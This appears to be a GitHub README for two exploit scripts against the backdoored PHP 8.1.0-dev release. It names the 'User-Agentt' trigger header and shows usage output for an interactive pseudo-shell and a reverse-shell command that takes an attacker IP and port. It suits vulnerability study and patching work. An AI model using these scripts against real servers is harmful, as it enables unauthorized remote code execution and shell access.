flast101 / php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PHP 8.1.0-dev Backdoor Remote Code Execution

PHP 8.1.0-dev Backdoor System Shell Script


PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.

Read full article: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/

POC Script

This short exploit script backdoor_php_8.1.0-dev.py uses the backdoor to provide a pseudo system shell on the host.Find it on Exploit DB.


└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Reverse Shell

This short exploit script revshell_php_8.1.0-dev.py gives a reverse shell on target.


└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>


Be Curious, Learning is Life ! 😃